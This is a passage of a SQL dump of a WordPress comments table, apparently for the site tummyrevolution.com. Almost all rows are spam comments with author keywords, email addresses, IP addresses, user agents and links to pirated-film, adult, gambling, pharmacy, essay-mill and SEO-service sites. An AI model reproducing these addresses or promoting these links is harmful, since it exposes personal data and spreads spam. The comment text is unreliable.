Vs. Others.\r\n\r\nCheck Out Our Coupons for This Month => https://zeep.ly/5uSUK',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','comment',0,0),(1222,5060,'sex filmleri','neverman50@yahoo.com','https://www.filmmodu.org/','45.130.255.241','2020-12-14 21:04:59','2020-12-14 21:04:59','Lorem ipsum dolor sit amet, consectetur adipiscing morbi iubse milinse tempus arcu nec tortor pellentesque lacinia felis lacus non nibh. Mable Jard Miksen',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1235,4674,'dobson','dobsonsmithio34aga3@yahoo.com','https://writemyessayforme.web.fc2.com/#writemyessay','5.188.211.13','2020-12-15 06:39:15','2020-12-15 06:39:15','BEM0C4 https://writemyessayforme.web.fc2.com/#writemyessay',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1237,4713,'dobson','dobsonsmithio34aga3@yahoo.com','https://writemyessayforme.web.fc2.com/#writemyessay','5.188.211.13','2020-12-15 06:59:04','2020-12-15 06:59:04','n6WbHz https://writemyessayforme.web.fc2.com/#writemyessay',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1238,2132,'dobson','dobsonsmithio34aga3@yahoo.com','https://writemyessayforme.web.fc2.com/#writemyessay','5.188.211.13','2020-12-15 07:00:40','2020-12-15 07:00:40','YwY0aO https://writemyessayforme.web.fc2.com/#writemyessay',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1292,5060,'sex','outofthedark@gmail.com','https://www.filmmodu.org/','45.135.36.215','2020-12-17 08:47:01','2020-12-17 08:47:01','Real nice design and style and wonderful content , nothing else we require : D. Jessalyn Vick Tiphani',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1300,5054,'porno','osufan1981@gmail.com','https://filmkovasi.org/','45.92.247.86','2020-12-17 19:53:48','2020-12-17 19:53:48','We came across a cool web page which you could possibly enjoy. Take a search in case you want. Marley Leighton Island',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1301,5060,'bahis','pimpinchick555@gmail.com','https://www.filmmodu.org/','45.154.56.154','2020-12-17 22:00:48','2020-12-17 22:00:48','There is definately a great deal to find out about this subject. I love all the points you have made. Donella Adan Renado',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1306,5060,'sikis','peterpage@mail.com','https://www.filmmodu.org/','185.250.39.247','2020-12-18 04:46:57','2020-12-18 04:46:57','There is certainly a lot to find out about this topic. I really like all of the points you have made. Diandra Salvidor Georas',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1308,5060,'bahis','pornopoe@yandex.com','https://www.filmmodu.org/','209.127.164.113','2020-12-18 08:23:34','2020-12-18 08:23:34','I pay a visit everyday some websites and sites to read articles, but this website presents feature based posts. Emylee Ulberto Cila',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1310,5060,'bahis','nd0237@yandex.com','https://www.filmmodu.org/','45.87.248.135','2020-12-18 10:12:39','2020-12-18 10:12:39','I like reading a post that can make men and women think. Rayshell Kennie Margery',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1311,5060,'sikis','mtnbike151@yandex.com','https://www.filmmodu.org/','45.141.176.156','2020-12-18 12:33:47','2020-12-18 12:33:47','Software as a Website. Yes, definitely takes the cake. Angele Sauncho Romona',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1313,5060,'erotik','ruffryders205@gmail.com','https://www.filmmodu.org/','185.250.39.247','2020-12-18 14:18:56','2020-12-18 14:18:56','You made some suitable factors there. I viewed the internet for the concern and also located most individuals will support with your website. Jannel Francois Vanderhoek',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1314,5060,'sikis','njrobertson@gmail.com','https://www.filmmodu.org/','45.142.28.125','2020-12-18 15:31:37','2020-12-18 15:31:37','This is a very weighty post. Thanks quest of posting this. Roxane Sly Jabon',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1316,5060,'erotik','sherrypfeifer@yahoo.com','https://www.filmmodu.org/','45.137.80.182','2020-12-18 17:43:45','2020-12-18 17:43:45','I just like the helpful info you provide on your articles. Storm Whittaker Liza',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1323,5060,'sikis','rexneffect@yandex.com','https://www.filmmodu.org/','45.87.249.62','2020-12-19 05:11:16','2020-12-19 05:11:16','A big thank you for your article. Thanks Again. Fantastic. Phillis Matthias Dalli',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1325,5060,'bahis','samuel_barrat@yahoo.com','https://www.filmmodu.org/','185.205.194.210','2020-12-19 08:46:18','2020-12-19 08:46:18','Asking questions are truly nice thing if you are not understanding something entirely, except this post offers nice understanding yet. Clare Domenico Janela',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1326,5060,'erotik','penners14@comcast.net','https://www.filmmodu.org/','45.130.255.175','2020-12-19 10:10:54','2020-12-19 10:10:54','Pam and I are excited to follow you on your journey. Daria Care Barbaresi',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1327,5060,'bahis','norrisnonan@yandex.com','https://www.filmmodu.org/','45.94.47.242','2020-12-19 12:11:20','2020-12-19 12:11:20','I like this post, enjoyed this one thank you for putting up. Raychel Sammie Vasos',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1328,5060,'bahis','pdthomps5@gmail.com','https://www.filmmodu.org/','45.134.187.119','2020-12-19 13:28:15','2020-12-19 13:28:15','There are some points in this article that I would never have thought of on my own. Thank you for your clear information. Adda Arlan Ful',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1331,5060,'erotik','sboullette@yandex.com','https://www.filmmodu.org/','45.136.231.92','2020-12-19 15:21:04','2020-12-19 15:21:04','Now I am going away to do my breakfast, once having my breakfast coming again to read further news. Cissy Emmit Sunderland',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1334,4659,'turkce','scorpionmarine@bellsouth.net','https://www.filmmodu.org/','45.152.202.173','2020-12-19 17:34:04','2020-12-19 17:34:04','There is visibly a bunch to identify about this. I consider you made various nice points in features also. Nannette Windham Gula',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1338,4659,'yetiskin','patricia.salazar63@gmail.com','https://www.filmmodu.org/','45.86.15.198','2020-12-19 20:37:46','2020-12-19 20:37:46','I like it whenever people come together and share ideas. Great website, keep it up. Jesse Beale Pricilla',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1341,4659,'yabanci','philiplinks@yahoo.com','https://www.filmmodu.org/','185.95.157.178','2020-12-19 23:50:08','2020-12-19 23:50:08','There is definately a great deal to find out about this subject. I really like all the points you have made. Sean Borden Bergin',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1342,4659,'sikis izle','mperret@sympatico.ca','https://www.filmmodu.org/','45.130.60.117','2020-12-20 01:09:24','2020-12-20 01:09:24','Yes! Finally something about MBBS Admission in Bangladesh. Stesha Henri Rand',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1346,4659,'torrent','sedyb@gmail.com','https://www.filmmodu.org/','45.137.43.88','2020-12-20 05:14:01','2020-12-20 05:14:01','I your writing style genuinely enjoying this site. Angelita Gardie Somerville',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1348,5060,'indir','sirmis@yandex.com','https://www.filmmodu.org/','45.137.43.116','2020-12-20 06:38:40','2020-12-20 06:38:40','Really enjoyed this post. Much thanks again. Much obliged. Linnie Urbanus Gagliano',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1350,5060,'bluray','mrsroho@yandex.com','https://www.filmmodu.org/','2.59.21.39','2020-12-20 08:52:10','2020-12-20 08:52:10','I really appreciate free, succinct, reliable data like this. Judie Casper Morie',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1352,5060,'yify','msranda420@yandex.com','https://www.filmmodu.org/','185.205.194.37','2020-12-20 10:00:31','2020-12-20 10:00:31','I was reading through some of your posts on this internet site and I think this internet site is really instructive! Keep posting . Filippa Nathan Christensen',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1355,5060,'bluray','music_lam@gmail.com','https://www.filmmodu.org/','144.168.210.89','2020-12-20 14:24:37','2020-12-20 14:24:37','If you want to take much from this piece of writing then you have to apply these methods to your won weblog. Kesley Levon Steel',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1357,5060,'download','pikerts5@yahoo.com','https://www.filmmodu.org/','198.154.92.124','2020-12-20 15:58:27','2020-12-20 15:58:27','Excellent, what a webpage it is! This website presents helpful facts to us, keep it up. Kamilah Westleigh Rheinlander',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1359,5060,'bedava','robsmurawa@gmail.com','https://www.filmmodu.org/','45.92.247.250','2020-12-20 19:23:34','2020-12-20 19:23:34','My family members every time say that I am wasting my time here at web, however I know I am getting know-how daily by reading such good articles. Charita Cleon Chloris',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1361,5060,'web-dl','michelinebeaumier@gmail.com','https://www.filmmodu.org/','45.152.208.204','2020-12-20 21:08:27','2020-12-20 21:08:27','Hi there, after reading this remarkable paragraph i am as well delighted to share my experience here with colleagues. Joelynn Pail Clarita',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1363,5060,'web-dl','rcm170@gmail.com','https://www.filmmodu.org/','45.130.60.153','2020-12-20 22:33:50','2020-12-20 22:33:50','Im grateful for the post. Much thanks again. Really Cool. Ros Brandtr Jenine',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1367,5060,'web-dl','pocmark@msn.com','https://www.filmmodu.org/','182.54.239.135','2020-12-21 05:25:36','2020-12-21 05:25:36','Dead pent content material , seeds Really enjoyed studying. Aleen Arman Yurt',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1375,5060,'ucretsiz','pdthomps5@gmail.com','https://www.filmmodu.org/','45.136.228.2','2020-12-21 21:12:48','2020-12-21 21:12:48','Nice answers in return of this query with genuine arguments and describing everything concerning that. Ariela Lief Hearn',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1386,5060,'yify','njatreehouse@sbcglobal.net','https://www.filmmodu.org/','45.137.43.131','2020-12-22 11:52:31','2020-12-22 11:52:31','That is just to make certain that your does not end up in the garbage can after a couple of days. Malanie Kellen Chadabe',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1389,2126,'WilliamLaf','teuicz@goposts.site','https://bit.ly/34nj4Ab','176.103.91.149','2020-12-22 18:05:39','2020-12-22 18:05:39','Hi, here on the forum guys advised a cool Dating site, be sure to register - you will not REGRET it https://bit.ly/34nj4Ab',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.34 Safari/537.36 Edg/83.0.478.25','comment',0,0),(1395,5060,'ucretsiz','perttyjess_14@gmail.com','https://www.filmmodu.org/','45.137.80.91','2020-12-23 04:00:12','2020-12-23 04:00:12','Hello friends, pleasant paragraph and pleasant arguments commented at this place, I am genuinely enjoying by these. Sabrina Jecho Nevins',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1399,4659,'bedava','mountdawg69@yahoo.com','https://www.filmmodu.org/','45.87.248.53','2020-12-23 06:39:15','2020-12-23 06:39:15','When it comes to gaming, it on his own PSN account. Melli Aloysius Usanis',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1401,4659,'bedava','pgroves5@cox.net','https://www.filmmodu.org/','185.126.65.12','2020-12-23 08:32:17','2020-12-23 08:32:17','Howdy! I just want to give you a huge thumbs up for your excellent info you have got here on this post. I am returning to your blog for more soon. Cassey Valentine Schaper',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1403,4659,'torrent','pfinn61@comcast.com','https://www.filmmodu.org/','185.95.157.10','2020-12-23 10:16:31','2020-12-23 10:16:31','You made certain nice points there. I did a search on the subject matter and found a good number of persons will consent with your blog. Joelle Allin Kleper',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1405,4659,'download','romain_79@gmail.com','https://www.filmmodu.org/','45.128.24.242','2020-12-23 11:51:00','2020-12-23 11:51:00','Whats up very nice website!! Man .. Excellent .. Wonderful .. Florie Owen Moriarty',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1411,4659,'yify','soccerprof@gmail.com','https://www.filmmodu.org/','45.87.249.156','2020-12-24 03:57:18','2020-12-24 03:57:18','I like this website because so much utile stuff on here : D. Annalee Adair Maxima',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1412,2132,'maseczki na twarz','jikoq|w|r|t|p|s|d|f|g|h|j|k|l|z|c|v|b|n|m}odiq|w|r|t|p|s|d|f|g|h|j|k|l|z|c|v|b|n|m}ivi@gmail.com','http://maskiprzeciwwirusowen.pl/','94.172.127.109','2020-12-24 04:00:33','2020-12-24 04:00:33','I’m extremely pleased to discover this website. I wanted to thank you for ones time just for this fantastic read!! I definitely enjoyed every part of it and i also have you bookmarked to see new stuff in your site.',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','comment',0,0),(1430,2126,'Robertcon','jdlea4@goposts.site','https://bit.ly/3hhve2N','92.249.13.213','2020-12-25 13:26:00','2020-12-25 13:26:00','Free Sex Dating https://bit.ly/3hhve2N',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4098.0 Safari/537.36','comment',0,0),(1436,4674,'Solomon Trethowan','trethowan.solomon@gmail.com','','185.95.157.247','2020-12-26 00:05:27','2020-12-26 00:05:27','Hello\r\n\r\nYOU NEED HELP FOR SEO LINK BUILDING? \r\n\r\nI just checked out your website tummyrevolution.com, and wanted to find out if you need help for SEO Link Building ?\r\n\r\nWe offer you the BEST SEO STRATEGY for 2021, my name is Solomon, and I\'m a SEO Specialist. \r\n \r\nBuild unlimited number of Backlinks and increase Traffic to your websites which will lead to a higher number of customers and much more sales for you. \r\n\r\nIf You Are Interested, I\'m waiting for your response here => https://bit.ly/32uQKuH\r\n\r\nThanks,\r\nSEO Specialist',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','comment',0,0),(1449,4674,'Sarah Moose','moose.sarah@yahoo.com','','45.86.15.60','2020-12-26 20:20:08','2020-12-26 20:20:08','Hello\r\n\r\nYOU NEED HELP FOR SEO LINK BUILDING? \r\n\r\nI just checked out your website tummyrevolution.com, and wanted to find out if you need help for SEO Link Building ?\r\n\r\nWe offer you the BEST SEO STRATEGY for 2021, my name is Sarah, and I\'m a SEO Specialist. \r\n \r\nBuild unlimited number of Backlinks and increase Traffic to your websites which will lead to a higher number of customers and much more sales for you. \r\n\r\nIf You Are Interested, I\'m waiting for your response here => https://bit.ly/32uQKuH\r\n\r\nThanks,\r\nSEO Specialist',0,'0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','comment',0,0),(1458,2132,'maseczki z filtrem','likaq|w|r|t|p|s|d|f|g|h|j|k|l|z|c|v|b|n|m}oleq|w|r|t|p|s|d|f|g|h|j|k|l|z|c|v|b|n|m}idu@gmail.com','http://maseczkiantywirusowen.pl/','94.172.127.109','2020-12-27 09:07:13','2020-12-27 09:07:13','I’m extremely pleased to discover this website. I wanted to thank you for ones time just for this fantastic read!! I absolutely enjoyed every part of it and i also have you bookmarked to see new stuff in your site.',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','comment',0,0),(1479,2132,'maseczki z filtrem','ginuq|w|r|t|p|s|d|f|g|h|j|k|l|z|c|v|b|n|m}olaq|w|r|t|p|s|d|f|g|h|j|k|l|z|c|v|b|n|m}afa@gmail.com','http://maseczkiantywirusowen.pl/','94.172.127.109','2020-12-28 08:27:00','2020-12-28 08:27:00','I’m extremely pleased to discover this website. I wanted to thank you for ones time just for this fantastic read!! I absolutely enjoyed every part of it and i also have you bookmarked to see new stuff in your site.',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','comment',0,0),(1482,2132,'pożyczka pozabankowa','zivaq|w|r|t|p|s|d|f|g|h|j|k|l|z|c|v|b|n|m}areq|w|r|t|p|s|d|f|g|h|j|k|l|z|c|v|b|n|m}iza@gmail.com','https://pozyczkiland.pl/','94.172.127.109','2020-12-28 09:53:08','2020-12-28 09:53:08','Thanks for the diverse tips contributed on this blog. I have noticed that many insurance providers offer shoppers generous reductions if they favor to insure a few cars with them. A significant variety of households own several autos these days, in particular those with more aged teenage kids still located at home, as well as the savings with policies may soon increase. So it will pay to look for a great deal.',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','comment',0,0),(1486,2132,'cialis online','jipiq|w|r|t|p|s|d|f|g|h|j|k|l|z|c|v|b|n|m}ediq|w|r|t|p|s|d|f|g|h|j|k|l|z|c|v|b|n|m}eli@gmail.com','https://docialisrx.com/','94.172.127.109','2020-12-28 12:47:37','2020-12-28 12:47:37','Definitely, what a great blog and revealing posts, I definitely will bookmark your site. Best Regards!',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','comment',0,0),(1582,2132,'pożyczki online','nehoq|w|r|t|p|s|d|f|g|h|j|k|l|z|c|v|b|n|m}ecuq|w|r|t|p|s|d|f|g|h|j|k|l|z|c|v|b|n|m}ica@gmail.com','https://pozyczkiland.pl/','94.172.222.145','2021-01-01 22:17:22','2021-01-01 22:17:22','I got what you intend,bookmarked, very decent website.',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','comment',0,0),(1599,2132,'car locksmith','locksmithdddd@gmail.com','https://local-auto-locksmith.co.uk/','89.76.56.217','2021-01-02 21:32:19','2021-01-02 21:32:19','I am incessantly thought about this, thanks for posting.',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','comment',0,0),(1603,2132,'chwilówki przez internet','chwilowkidddd@gmail.com','https://chwilowki-pozyczka.pl/','94.172.222.145','2021-01-03 01:56:44','2021-01-03 01:56:44','I reckon something truly special in this website.',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','comment',0,0),(1605,2132,'new key card for renault megane','locksmithdddd@gmail.com','https://local-auto-locksmith.co.uk/renault/','94.172.222.145','2021-01-03 03:27:53','2021-01-03 03:27:53','Some really great info, Gladiola I detected this. I\'m not spaming. I\'m just saying your website is AWSOME! Thank you so much! Please vist also my website.',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','comment',0,0),(1644,1110,'uhadiudakoqal','usuasu@fdghgf.emailddtr.com','','62.210.207.209','2021-01-06 03:55:04','2021-01-06 03:55:04','http://mewkid.net/when-is-xuxlya2/ - Amoxicillin 500 Mg Dosage Amoxicillin ztr.eemd.tummyrevolution.com.myv.km http://mewkid.net/when-is-xuxlya2/',0,'0','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 Edg/83.0.478.37','review',0,0),(1702,2132,'dobson','smithio34ga2534@yahoo.com','https://writemyessayforme.web.fc2.com/octavio-paz-essay-day-of-the-dead.html','5.188.211.13','2021-01-09 09:02:30','2021-01-09 09:02:30','EcxY6u https://writemyessayforme.web.fc2.com/octavio-paz-essay-day-of-the-dead.html',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1703,4674,'dobson','smithio34ga2534@yahoo.com','https://writemyessayforme.web.fc2.com/octavio-paz-essay-day-of-the-dead.html','5.188.211.13','2021-01-09 09:12:49','2021-01-09 09:12:49','EckXma https://writemyessayforme.web.fc2.com/octavio-paz-essay-day-of-the-dead.html',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1705,4713,'dobson','smithio34ga2534@yahoo.com','https://writemyessayforme.web.fc2.com/octavio-paz-essay-day-of-the-dead.html','5.188.211.13','2021-01-09 11:29:22','2021-01-09 11:29:22','EVvnQp https://writemyessayforme.web.fc2.com/octavio-paz-essay-day-of-the-dead.html',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1707,2132,'johnanz','smithio34ga2s534@yahoo.com','http://waldorfdollshop.us/','5.188.211.13','2021-01-09 13:15:42','2021-01-09 13:15:42','GHgxQ8 http://waldorfdollshop.us/ waldorf doll',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1708,4674,'johnanz','smithio34ga2s534@yahoo.com','http://waldorfdollshop.us/','5.188.211.13','2021-01-09 13:26:58','2021-01-09 13:26:58','cpfZ3l http://waldorfdollshop.us/ waldorf doll',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1710,4713,'johnanz','smithio34ga2s534@yahoo.com','http://waldorfdollshop.us/','5.188.211.13','2021-01-09 15:48:09','2021-01-09 15:48:09','plWVof http://waldorfdollshop.us/ waldorf doll',0,'0','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','comment',0,0),(1731,4659,'indir','retirede7@comcast.net','https://sinefy.com/','2.59.21.219','2021-01-11 22:02:29','2021-01-11 22:02:29','I like it when folks come together and share opinions. Great site, keep it up. Maurizia Bailey Britt',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1738,5054,'bluray','mikemcgurk1@yahoo.com','https://sinefy.com/','45.137.80.182','2021-01-12 09:21:34','2021-01-12 09:21:34','I am sure this paragraph has touched all the internet viewers, its really really fastidious article on building up new blog. Lee Silvio Dagley',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1743,5410,'dublaj','njprincess13@yahoo.com','https://sinefy.com/','45.154.56.154','2021-01-12 18:27:46','2021-01-12 18:27:46','Hi, this weekend is nice for me, since this occasion i am reading this impressive informative article here at my house. Yovonnda Darrell Prosser',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1749,5410,'web-dl','ninijo4@yandex.com','https://sinefy.com/','45.154.84.126','2021-01-12 23:15:12','2021-01-12 23:15:12','Really informative article post. Really looking forward to read more. Katharyn Thurstan Oakleil',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1752,5352,'yabanci','mizzgoodbar@gmail.com','https://sinefy.com/','193.8.56.68','2021-01-13 04:55:21','2021-01-13 04:55:21','Wonderful work! This is the type of info that are meant to be shared across the internet. Fionna Denny Lonnie',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1762,5352,'hd film izle','platinumplayasclub@yahoo.com','https://sinefy.com/','45.130.255.59','2021-01-13 14:58:52','2021-01-13 14:58:52','Thankfulness to my father who told me regarding this weblog, this webpage is really amazing. Chloe Hernando Joselyn',0,'spam','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1764,5410,'hd film izle','parsonsjay@yahoo.com','https://www.filmmodu.org/','45.136.173.91','2021-01-13 16:24:02','2021-01-13 16:24:02','You completed various fine points there. I did a search on the matter and found most folks will have the same opinion with your blog. Wynny Alyosha Colette',0,'0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36','comment',0,0),(1767,4674,'Holly Main','main.holly@yahoo.com','','45.94.47.36','2021-01-13 19:39:09','2021-01-13 19:39:09','Hello\r\n\r\nYOU NEED QUALITY VISITORS FOR YOUR: tummyrevolution.com\r\n \r\nWE PROVIDE ORGANIC VISITORS BY KEYWORD FROM SEARCH ENGINES OR SOCIAL MEDIA\r\n \r\nYOU GET HIGH-QUALITY VISITORS\r\n - visitors from search engines\r\n - visitors from social media\r\n - visitors from any country you want\r\n \r\nCLAIM YOUR 24 HOURS FREE TEST => https://bit.ly/2HQZggh\r\n \r\n \r\nThanks, 